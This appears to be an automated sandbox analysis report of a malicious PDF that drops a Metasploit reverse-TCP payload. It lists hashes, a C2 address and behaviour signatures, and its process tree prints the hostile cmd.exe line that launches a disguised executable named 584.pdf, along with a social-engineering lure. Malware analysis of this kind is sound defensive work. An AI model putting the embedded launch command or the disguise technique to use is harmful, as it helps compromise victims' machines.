Analysis

  • max time kernel
    139s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    24-12-2024 13:16

General

  • Target

    53373bad4e9ebce6d133cf2f08bce78a523bb2faf40840d7d3a7c0fe24dec027.pdf

  • Size

    300KB

  • MD5

    6e38c1f164bfc763d444c39fe4e165b0

  • SHA1

    5c4151862bb052a50e4588d7be35a9a5ea6b16cf

  • SHA256

    53373bad4e9ebce6d133cf2f08bce78a523bb2faf40840d7d3a7c0fe24dec027

  • SHA512

    cfab07afb8ca14fcac97cc4564130e88a7de4d885234b920dc3e5c8122d97c1881ca5b92761861d7d3c9479800ef5e973efffc24caacbcbe2be1ff85141381c7

  • SSDEEP

    6144:po8OtPgMX+Pu8SW8cjTnpVJg3qtD8AWuvdBYm5gTK0:iPgCSVSXc3pzPtD1Wuv3ge0

Malware Config

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

192.168.10.70:4444

Signatures

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Metasploit family
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 31 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\53373bad4e9ebce6d133cf2f08bce78a523bb2faf40840d7d3a7c0fe24dec027.pdf"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2328
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist "Desktop\584.pdf" (cd "Desktop"))&(if exist "My Documents\584.pdf" (cd "My Documents"))&(if exist "Documents\584.pdf" (cd "Documents"))&(if exist "Escritorio\584.pdf" (cd "Escritorio"))&(if exist "Mis Documentos\584.pdf" (cd "Mis Documentos"))&(start 584.pdf) To view the encrypted content please tick the "Do not show this message again" box and press Open.
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2928
      • \??\c:\Users\Admin\Documents\584.pdf
        584.pdf
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:1380

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

    Filesize

    3KB

    MD5

    7c5d5f42664922a799e4fda736850682

    SHA1

    ae4661ece8bac0b0c2282c37ce418c3899e83372

    SHA256

    439f02a2c9c9d4dc13b7dc9ba8fad410f05d390ada56bb3e509fa33277568c52

    SHA512

    71e84c30c22eaca19e591ae4fd5a602aec45f44d040e7bd87a2e7096fcc50c4027ac7825612e60d5c6003f85a2859f904540cbe93f10649a3f8245a8e4b1bce8

  • \??\c:\Users\Admin\Documents\584.pdf

    Filesize

    72KB

    MD5

    861e43667d84d76bff05868a9d4de52e

    SHA1

    643167f1ab323b376c017241131d5372a3c3c158

    SHA256

    560ac90f2c486d526cbb6e56cb9fe10e5c354c17d6b232c9dd67cfeac78b8119

    SHA512

    71d0033530850e76c961d4163a1b6edb5d9963ad5c4f633824e04794636978c759026f8ee36c94dea100d454f94b5c9b4870da9e4b2920ae0ed650f54429cf14